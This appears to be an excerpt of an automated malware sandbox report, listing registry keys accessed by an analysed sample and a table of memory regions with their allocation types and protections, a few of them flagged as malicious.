HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
There are 389 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
 malicious
110B1000
trusted library allocation
page read and write
 malicious
42C8000
trusted library allocation
page read and write
 malicious
166B0000
trusted library section
page read and write
 malicious
50AC000
stack
page read and write
7B0000
heap
page read and write
420000
heap
page read and write
3BBF000
heap
page read and write
6286000
trusted library allocation
page read and write
5C64000
heap
page read and write
96B1000
trusted library allocation
page read and write
66E000
heap
page read and write
1F60000
heap
page read and write
5BE000
heap
page read and write
320000
trusted library allocation
page read and write
3BA3000
heap
page read and write
470000
heap
page read and write
350000
heap
page read and write
3BEA000
heap
page read and write
495D000
stack
page read and write
900000
trusted library allocation
page read and write
2A9F000
trusted library allocation
page read and write
3FE000
stack
page read and write | page guard
2C0000
trusted library allocation
page read and write
F0000
heap
page execute and read and write
3C2B000
heap
page read and write
527000
heap
page read and write
5BE000
heap
page read and write
22BA000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
60DE000
stack
page read and write | page guard
3BBF000
heap
page read and write
70B1000
trusted library allocation
page read and write
C84000
heap
page read and write
A20000
heap
page read and write
2971000
trusted library allocation
page read and write
2B04000
heap
page read and write
8F0000
trusted library allocation
page read and write
290000
trusted library allocation
page execute and read and write
4CB000
heap
page read and write
6B6000
heap
page read and write
252F000
heap
page read and write
500F000
heap
page read and write
3BD000
stack
page read and write
31E5000
trusted library allocation
page read and write
330000
trusted library allocation
page read and write
7F3000
heap
page read and write
59F3000
heap
page read and write
26F1000
trusted library allocation
page read and write
2472000
trusted library allocation
page read and write
2A0000
trusted library allocation
page read and write
2342000
trusted library allocation
page read and write
10000
heap
page read and write
45DA000
stack
page read and write
4C42000
heap
page read and write
3B71000
heap
page read and write
5EC0000
heap
page read and write
60DF000
stack
page read and write
6F0000
heap
page read and write
6A4000
heap
page read and write
3D8D000
stack
page read and write
C7E000
stack
page read and write
2B0000
trusted library allocation
page read and write
2732000
trusted library allocation
page read and write
260F000
stack
page read and write
3BCB000
heap
page read and write
672000
heap
page read and write
501C000
heap
page read and write
252000
trusted library allocation
page read and write
37CF000
stack
page read and write
251D000
heap
page read and write
4A8F000
stack
page read and write
3BCF000
heap
page read and write
456E000
stack
page read and write
C1F000
stack
page read and write
CA2000
heap
page read and write
243E000
stack
page read and write
330000
heap
page read and write
4D0E000
stack
page read and write
534F000
heap
page read and write
1DDD000
stack
page read and write
2110000
direct allocation
page read and write
638E000
stack
page read and write
4570000
trusted library allocation
page execute and read and write
E20000
trusted library allocation
page read and write
2540000
heap
page read and write
2B84000
heap
page read and write
262F000
stack
page read and write
5C6E000
stack
page read and write
5C60000
heap
page read and write
457D000
stack
page read and write
6289000
trusted library allocation
page read and write
4F70000
heap
page read and write
5BE000
heap
page read and write
5120000
trusted library allocation
page read and write
5F9E000
stack
page read and write
7EF20000
trusted library allocation
page execute and read and write
31E2000
trusted library allocation
page read and write
D90000
trusted library allocation
page read and write
910000
trusted library allocation
page read and write
10000
heap
page read and write
51FE000
stack
page read and write
50B0000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
4BA0000
heap
page read and write
5120000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
47E000
heap
page read and write
7FCE000
trusted library allocation
page read and write
8AE000
heap
page read and write
5CB000
heap
page read and write
47FE000
stack
page read and write
2498000
trusted library allocation
page read and write
7AF8000
trusted library allocation
page read and write
29B3000
trusted library allocation
page read and write
621F000
stack
page read and write
5C82000
heap
page read and write
2A72000
trusted library allocation
page read and write
2545000
heap
page read and write
608E000
stack
page read and write
250000
trusted library allocation
page read and write
230000
heap
page read and write
2E0000
trusted library allocation
page execute and read and write
8020000
trusted library allocation
page read and write
3BBB000
heap
page read and write
31A0000
heap
page read and write
5502000
heap
page read and write
5AB000
heap
page read and write
3C7000
heap
page read and write
534000
heap
page read and write
368C000
stack
page read and write
4D46000
heap
page read and write
4AF0000
heap
page read and write
720000
heap
page read and write
4BC3000
heap
page read and write
4BE000
heap
page read and write
1ED0000
remote allocation
page read and write
4BB6000
heap
page read and write
283F000
stack
page read and write
271A000
trusted library allocation
page read and write
4DD1000
heap
page read and write
4DB4000
heap
page read and write
31E1000
trusted library allocation
page read and write
271E000
trusted library allocation
page read and write
2722000
heap
page read and write
2B4C000
stack
page read and write
2569000
heap
page read and write
559E000
stack
page read and write
54BE000
stack
page read and write
194000
trusted library allocation
page read and write
24D1000
trusted library allocation
page read and write
4A20000
heap
page execute and read and write
439D000
stack
page read and write
26F5000
trusted library allocation
page read and write
2401000
trusted library allocation
page read and write
2440000
trusted library allocation
page read and write
2A9B000
trusted library allocation
page read and write
2D0000
trusted library allocation
page read and write
D30000
heap
page execute and read and write
4DAE000
stack
page read and write
630000
heap
page read and write
28CE000
trusted library allocation
page read and write
10000
heap
page read and write
2B00000
heap
page read and write
4500000
trusted library allocation
page read and write
2052000
heap
page read and write
72B000
heap
page read and write
26D1000
trusted library allocation
page read and write
4500000
trusted library allocation
page read and write
910000
heap
page execute and read and write
599F000
stack
page read and write
2A23000
trusted library allocation
page read and write
19D000
trusted library allocation
page execute and read and write
9EE000
stack
page read and write
2FBA000
heap
page read and write
4BB6000
heap
page read and write
24BA000
trusted library allocation
page read and write
4670000
heap
page read and write
2FA0000
heap
page read and write
DDF000
stack
page read and write
81A5000
trusted library allocation
page read and write
36D1000
trusted library allocation
page read and write
4590000
trusted library allocation
page read and write
5C0000
heap
page read and write
3BC6000
heap
page read and write
23FE000
stack
page read and write | page guard
860000
trusted library allocation
page read and write
52C0000
heap
page read and write
2034000
heap
page read and write
60E0000
heap
page read and write
700000
heap
page read and write
B6B1000
trusted library allocation
page read and write
580000
trusted library allocation
page execute and read and write
410000
trusted library allocation
page read and write
D40000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
A2F000
stack
page read and write
50B0000
trusted library allocation
page read and write
6EA000
heap
page read and write
4F2F000
stack
page read and write
5AB000
heap
page read and write
26CE000
stack
page read and write
22A1000
trusted library allocation
page read and write
E1C000
stack
page read and write
5A9000
heap
page read and write
46F4000
heap
page read and write
300000
heap
page read and write
4BA1000
heap
page read and write
2569000
heap
page read and write
960000
trusted library allocation
page read and write
360000
trusted library allocation
page read and write
2B0B000
heap
page read and write
520000
trusted library allocation
page read and write
510000
trusted library allocation
page read and write
637000
heap
page read and write
23BA000
stack
page read and write
7D4000
heap
page read and write
1AD000
trusted library allocation
page execute and read and write
2FE000
stack
page read and write
7EF40000
trusted library allocation
page execute and read and write
7FE000
heap
page read and write
319000
trusted library allocation
page read and write
5300000
heap
page read and write
296F000
stack
page read and write
4EAE000
stack
page read and write
5BE000
heap
page read and write
4BB6000
heap
page read and write
491F000
stack
page read and write
49B000
heap
page read and write
3B71000
heap
page read and write
475E000
stack
page read and write
D90000
trusted library allocation
page read and write
198000
heap
page read and write
2A3000
trusted library allocation
page execute and read and write
3C4E000
heap
page read and write
246F000
stack
page read and write
916000
heap
page execute and read and write
8E0000
trusted library allocation
page read and write
4C9D000
stack
page read and write
190000
trusted library allocation
page read and write
50B0000
trusted library allocation
page read and write
4110000
heap
page read and write
4D57000
heap
page read and write
4896000
heap
page execute and read and write
323000
trusted library allocation
page read and write
527000
heap
page read and write
5B8000
heap
page read and write
85E000
heap
page read and write
20E0000
heap
page read and write
24B1000
trusted library allocation
page read and write
34B1000
trusted library allocation
page read and write
270C000
trusted library allocation
page read and write
40E000
stack
page read and write
62C4000
trusted library allocation
page read and write
1C2000
trusted library allocation
page read and write
3FF000
stack
page read and write
20000
heap
page read and write
116B1000
trusted library allocation
page read and write
54B000
heap
page read and write
1E5D000
stack
page read and write
4F9E000
stack
page read and write
520000
heap
page read and write
45F0000
heap
page read and write
5A3000
heap
page read and write
471F000
stack
page read and write
2470000
heap
page read and write
5120000
trusted library allocation
page read and write
9AE000
stack
page read and write
231C000
stack
page read and write
520000
heap
page read and write
4B0000
heap
page execute and read and write
44ED000
stack
page read and write
757000
heap
page read and write
24B2000
trusted library allocation
page read and write
3BC5000
heap
page read and write
522000
heap
page read and write
7AD5000
trusted library allocation
page read and write
3BEE000
heap
page read and write
62F000
heap
page read and write
4F40000
heap
page read and write
24D4000
trusted library allocation
page read and write
54E000
heap
page read and write
34D9000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
300000
trusted library allocation
page execute and read and write
2A4000
trusted library allocation
page read and write
50FF000
stack
page read and write
302E000
stack
page read and write
3A4E000
stack
page read and write
571D000
heap
page read and write
A0B1000
trusted library allocation
page read and write
2EAF000
stack
page read and write
400000
trusted library allocation
page execute and read and write
3B10000
heap
page read and write
1A3000
trusted library allocation
page execute and read and write
360000
heap
page read and write
4D4B000
heap
page read and write
451E000
stack
page read and write
36F9000
trusted library allocation
page read and write
3C4E000
heap
page read and write
350000
trusted library allocation
page read and write
95E000
stack
page read and write
2330000
trusted library allocation
page read and write
514E000
stack
page read and write
66B1000
trusted library allocation
page read and write
4D53000
heap
page read and write
607000
heap
page read and write
10000
heap
page read and write
5BE000
heap
page read and write
4D1E000
stack
page read and write
5A2000
heap
page read and write
20000
heap
page read and write
310000
trusted library allocation
page read and write
2B08000
heap
page read and write
286E000
stack
page read and write
56D000
heap
page read and write
356000
heap
page read and write
340000
heap
page read and write
2450000
trusted library allocation
page read and write
1ED0000
remote allocation
page read and write
2555000
heap
page read and write
4C2D000
stack
page read and write
1FAE000
stack
page read and write
4CDE000
stack
page read and write
222F000
stack
page read and write
4CC2000
heap
page read and write
DDF000
stack
page read and write
569E000
stack
page read and write
5A9000
heap
page read and write
48AF000
stack
page read and write
5120000
trusted library allocation
page read and write
2C2000
trusted library allocation
page read and write
4C94000
heap
page read and write
46B0000
heap
page read and write
74E000
stack
page read and write
8AE000
stack
page read and write
3DCF000
stack
page read and write
299000
stack
page read and write
859000
heap
page read and write
6296000
trusted library allocation
page read and write
710000
trusted library allocation
page read and write
5ED000
heap
page read and write
5520000
heap
page read and write
23FB000
stack
page read and write
5C7000
heap
page read and write
40E000
heap
page read and write
4E6E000
stack
page read and write
2100000
heap
page read and write
1E60000
heap
page read and write
486E000
stack
page read and write | page guard
2DB000
trusted library allocation
page execute and read and write
5B8000
heap
page read and write
1C0000
heap
page read and write
48D0000
heap
page read and write
34F0000
heap
page read and write
51CE000
stack
page read and write
865000
heap
page read and write
338000
heap
page read and write
290000
heap
page read and write
58F000
stack
page read and write
86B1000
trusted library allocation
page read and write
460000
trusted library allocation
page read and write
22C0000
trusted library allocation
page read and write
25EA000
trusted library allocation
page read and write
45BC000
stack
page read and write
C80000
heap
page read and write
29D3000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
601D000
stack
page read and write
59E0000
heap
page read and write
8EF000
stack
page read and write
4BA8000
heap
page read and write
3BEE000
heap
page read and write
5B8000
heap
page read and write
1C7000
trusted library allocation
page execute and read and write
5ED000
heap
page read and write
2BD000
trusted library allocation
page execute and read and write
2B60000
trusted library allocation
page read and write
3BA3000
heap
page read and write
8F0000
trusted library allocation
page read and write
566000
heap
page read and write
5000000
heap
page read and write
5C6000
heap
page read and write
81A1000
trusted library allocation
page read and write
2543000
heap
page read and write
5120000
trusted library allocation
page read and write
253E000
heap
page read and write
270E000
trusted library allocation
page read and write
49BF000
stack
page read and write
13C000
stack
page read and write
4FD0000
heap
page read and write
5C0000
heap
page read and write
2B88000
heap
page read and write
4C2E000
stack
page read and write
2D2000
trusted library allocation
page read and write
2D6000
stack
page read and write
2CA000
trusted library allocation
page execute and read and write
477F000
stack
page read and write
22AE000
trusted library allocation
page read and write
34E000
stack
page read and write
310000
heap
page read and write
255000
trusted library allocation
page execute and read and write
4580000
trusted library allocation
page read and write
1ECE000
stack
page read and write
5120000
trusted library allocation
page read and write
4F0000
heap
page read and write
49AE000
stack
page read and write
2760000
trusted library allocation
page read and write
5700000
heap
page read and write
471E000
stack
page read and write | page guard
330000
heap
page read and write
2992000
trusted library allocation
page read and write
600000
heap
page read and write
5DB000
heap
page read and write
4DDE000
stack
page read and write
18C000
stack
page read and write
950000
trusted library allocation
page read and write
5C5F000
stack
page read and write
4F5D000
heap
page read and write
2AD3000
trusted library allocation
page read and write
66F000
heap
page read and write
2320000
trusted library allocation
page read and write
50FE000
stack
page read and write | page guard
3B6B000
heap
page read and write
1A0000
trusted library allocation
page read and write
16A000
stack
page read and write
4C43000
heap
page read and write
624000
heap
page read and write
513F000
stack
page read and write
2525000
heap
page read and write
2D9000
stack
page read and write
88000
stack
page read and write
2460000
trusted library allocation
page read and write
106B1000
trusted library allocation
page read and write
2435000
trusted library allocation
page read and write
4BBE000
heap
page read and write
3BEE000
heap
page read and write
44FC000
stack
page read and write
327000
trusted library allocation
page read and write
16B000
stack
page read and write
6541000
heap
page read and write
3B71000
heap
page read and write
7C8A000
trusted library allocation
page read and write
53A000
heap
page read and write
575000
heap
page read and write
254A000
heap
page read and write
3B50000
heap
page read and write
180000
trusted library allocation
page read and write
1AA000
trusted library allocation
page read and write
3B53000
heap
page read and write
4BA4000
heap
page read and write
2700000
heap
page read and write
4BC4000
heap
page read and write
2A74000
trusted library allocation
page read and write
4F5E000
stack
page read and write
5120000
trusted library allocation
page read and write
A2E000
stack
page read and write | page guard
253A000
heap
page read and write
4F20000
heap
page read and write
500000
trusted library allocation
page execute and read and write
4F3E000
stack
page read and write
2340000
trusted library allocation
page read and write
4FCD000
stack
page read and write
310000
heap
page read and write
5B8000
heap
page read and write
180000
trusted library allocation
page read and write
4A0D000
stack
page read and write
2B80000
heap
page read and write
7EDE000
trusted library allocation
page read and write
5BE000
heap
page read and write
3BC5000
heap
page read and write
3B6D000
heap
page read and write
46CD000
heap
page read and write
4D2F000
stack
page read and write
5120000
trusted library allocation
page read and write
30EE000
stack
page read and write
2524000
heap
page read and write
46DF000
heap
page read and write
2C6000
trusted library allocation
page execute and read and write
4ACD000
stack
page read and write
2521000
heap
page read and write
57D000
stack
page read and write
1C5000
trusted library allocation
page execute and read and write
E20000
trusted library allocation
page read and write
5A2000
heap
page read and write
3BB2000
heap
page read and write
363E000
stack
page read and write
287000
stack
page read and write
370000
heap
page read and write
2500000
heap
page read and write
20AF000
stack
page read and write
2F0000
trusted library allocation
page read and write
2DF000
stack
page read and write
4C1A000
heap
page read and write
463F000
stack
page read and write
543E000
stack
page read and write
31E4000
trusted library allocation
page read and write
2A03000
trusted library allocation
page read and write
307C000
stack
page read and write
3401000
trusted library allocation
page read and write
5A9000
heap
page read and write
536F000
heap
page read and write
294E000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
530000
heap
page read and write
3BB1000
heap
page read and write
D40000
trusted library allocation
page read and write
329000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
3AAC000
stack
page read and write
44F0000
trusted library allocation
page execute and read and write
4500000
trusted library allocation
page read and write
2D2000
trusted library allocation
page read and write
2690000
heap
page execute and read and write
3BA3000
heap
page read and write
2470000
heap
page read and write
10000
heap
page read and write
7B7000
heap
page read and write
2569000
heap
page read and write
31E3000
trusted library allocation
page read and write
3BCD000
heap
page read and write
81A3000
trusted library allocation
page read and write
514000
heap
page read and write
1A4000
trusted library allocation
page read and write
2716000
trusted library allocation
page read and write
534C000
heap
page read and write
53C9000
heap
page read and write
4019000
trusted library allocation
page read and write
458000
trusted library allocation
page read and write
781000
heap
page read and write
428F000
stack
page read and write
2704000
heap
page read and write
3BC5000
heap
page read and write
50B0000
heap
page read and write
3BA3000
heap
page read and write
5B8000
heap
page read and write
4F0000
trusted library allocation
page read and write
65F000
heap
page read and write
6272000
trusted library allocation
page read and write
5AB000
heap
page read and write
4890000
heap
page execute and read and write
D3D000
stack
page read and write
4A4F000
stack
page read and write
280E000
stack
page read and write
663000
heap
page read and write
17C000
stack
page read and write
8C0000
trusted library allocation
page read and write
4BC0000
heap
page read and write
2B8B000
heap
page read and write
4D42000
heap
page read and write
193000
trusted library allocation
page execute and read and write
81C3000
trusted library allocation
page read and write
232E000
stack
page read and write
5120000
trusted library allocation
page read and write
4E1E000
stack
page read and write
46EF000
heap
page read and write
4EBD000
stack
page read and write
513000
heap
page read and write
76B1000
trusted library allocation
page read and write
383000
heap
page read and write
376000
heap
page read and write
5180000
heap
page read and write
2D7000
trusted library allocation
page execute and read and write
5DB000
heap
page read and write
18A000
stack
page read and write
3EA000
heap
page read and write
D8D000
stack
page read and write
252C000
heap
page read and write
4DB0000
heap
page read and write
4D43000
heap
page read and write
530000
heap
page read and write
2B5C000
trusted library allocation
page read and write
900000
trusted library allocation
page read and write
2A96000
trusted library allocation
page read and write
A10000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
22E0000
trusted library allocation
page execute and read and write
3BEF000
heap
page read and write
20EE000
stack
page read and write
510000
trusted library allocation
page read and write
2A35000
trusted library allocation
page read and write
526000
heap
page read and write
31E0000
trusted library allocation
page read and write
4D5E000
stack
page read and write
4BB8000
heap
page read and write
2569000
heap
page read and write
408F000
stack
page read and write
2A7000
stack
page read and write
35E000
stack
page read and write
311E000
trusted library allocation
page read and write
1BA000
trusted library allocation
page read and write
4E2F000
stack
page read and write
4CBF000
stack
page read and write
190000
heap
page read and write
1FAE000
stack
page read and write
1FE0000
heap
page read and write
236F000
stack
page read and write
4CC3000
heap
page read and write
252000
heap
page read and write
654000
heap
page read and write
249E000
trusted library allocation
page read and write
75B5000
trusted library allocation
page read and write
5DDE000
stack
page read and write
C6B1000
trusted library allocation
page read and write
2A27000
trusted library allocation
page read and write
3BB5000
heap
page read and write
255B000
heap
page read and write
2AD000
trusted library allocation
page execute and read and write
800000
heap
page read and write
3EF000
stack
page read and write
234000
heap
page read and write
237E000
stack
page read and write
54E0000
heap
page read and write
24A000
trusted library allocation
page execute and read and write
4BA1000
heap
page read and write
54E4000
heap
page read and write
5A9000
heap
page read and write
23FF000
stack
page read and write
644E000
stack
page read and write
25EE000
stack
page read and write
22B5000
trusted library allocation
page read and write
10000
heap
page read and write
65F000
heap
page read and write
8D0000
trusted library allocation
page read and write
7FD6000
trusted library allocation
page read and write
3429000
trusted library allocation
page read and write
55A000
heap
page read and write
1E70000
direct allocation
page read and write
3BCD000
heap
page read and write
62D0000
heap
page read and write
2548000
heap
page read and write
5120000
trusted library allocation
page read and write
2A0000
trusted library allocation
page read and write
4BA5000
heap
page read and write
89000
stack
page read and write
5327000
heap
page read and write
3BBD000
heap
page read and write
39EF000
stack
page read and write
750000
heap
page read and write
24F5000
trusted library allocation
page read and write
28E6000
trusted library allocation
page read and write
1F20000
heap
page read and write
22DE000
stack
page read and write
4BC0000
heap
page read and write
555E000
stack
page read and write
700000
trusted library allocation
page read and write
2030000
heap
page read and write
3619000
trusted library allocation
page read and write
770000
heap
page read and write
7FD4000
trusted library allocation
page read and write
4E3C000
stack
page read and write
3EE0000
heap
page read and write
547F000
stack
page read and write
4B60000
heap
page read and write
486F000
stack
page read and write
1F5F000
stack
page read and write
3600000
trusted library allocation
page read and write
5A2000
heap
page read and write
6530000
heap
page read and write
2BB5000
trusted library allocation
page read and write
2B0E000
stack
page read and write
190000
trusted library allocation
page read and write
81A7000
trusted library allocation
page read and write
250E000
stack
page read and write
7AFE000
trusted library allocation
page read and write
5B8000
heap
page read and write
5AB000
heap
page read and write
2569000
heap
page read and write
4F7000
heap
page read and write
2DAE000
stack
page read and write
38DF000
stack
page read and write
2716000
trusted library allocation
page read and write
29F3000
trusted library allocation
page read and write
There are 664 hidden memdumps, click here to show them.